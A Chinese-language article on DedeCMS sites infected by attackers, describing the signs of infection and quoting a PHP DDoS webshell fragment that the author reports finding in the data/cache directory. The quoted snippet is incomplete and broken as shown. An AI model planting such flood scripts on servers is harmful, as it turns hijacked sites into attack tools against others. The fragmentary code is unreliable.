dedecms怎么解决ddos挂马漏洞?
Dedecms是国内著名的php开源系统,也是很多站长建站的首选CMS系统,简单易用是其广泛实用的一大原因,而正是因为dedecms的开源,也导致了很多黑客盯上了这个程序,于是接连研究出了很多dedecms的漏洞,造成了目前有相当多的dedecms网站都被挂马了,有的被机房警告,严重的机房被强行关站,损失巨大。今天就这一问题做较为深入的剖析,找出解决之道。
推荐学习:织梦cms
被挂马的特征:
打开自己的网站首页,用查看源代码的方式会发现自己的网站被增加了许许多多的黑链代码,黑链代码是最简单也最能让站长们看出来的,他无非就是友情链接的代码。
再一个特征就是打开网站会被360安全提示网站存在挂马风险,这一类型的挂马代码,一般是框架代码或者是js代码或者是图片代码,还有个特征就是网站会突然打不开或者打开慢,检查流量会发现自己占用了许多流量,也就是说流量往外发包的特征,也叫UDP流量发包攻击。以上就是dedecms被挂马的大体特征,下面就讲点实际的,网站被挂马的解决办法和预防措施。
首先把网站程序的代码下载到自己的本地,用sinesafe木马清除工具检测了一下,发现data/cache/目录下有许多脚本木马,打开木马脚本发现了一些不认识的PHP代码,把代码放到sinesafe木马工具里深度剖析了一下发现了木马特征,代码如下:
代码如下:
<?phpset_time_limit(984918);$host=$_GET['host'];$port=$_GET['port'];$exec_time=$_GET['time'];$Sendlen=65535;$packets=0;}echo"================================================";echo"<fontcolor=blue>www.phpddos.com";echo"SYNFlood模块";echo"作者:ybhacker";echo"警告:本程序带有攻击性,仅供安全研究与教学之用,风险自负!</font>";echo"================================================";echo"攻击包总数:<fontcolor=Red><spanclass=\"text\">".$packets."个数据包</span></font>";echo"攻击总流量:<fontcolor=Red><spanclass=\"text\">".round(($packets*65*8)/(1024*1024),2)."Mbps</span></font>";echo"攻击总字节:<fontcolor=Red><spanclass=\"text\">".time('h:i:s')."字节</span></font>";echo"Packetcompleteat".time('h:i:s')."with$packets(".round(($packets*65*8)/(1024*1024),2)."Mbps)packetsaveraging".round($packets/$exec_time,2)."packets/s\n";?>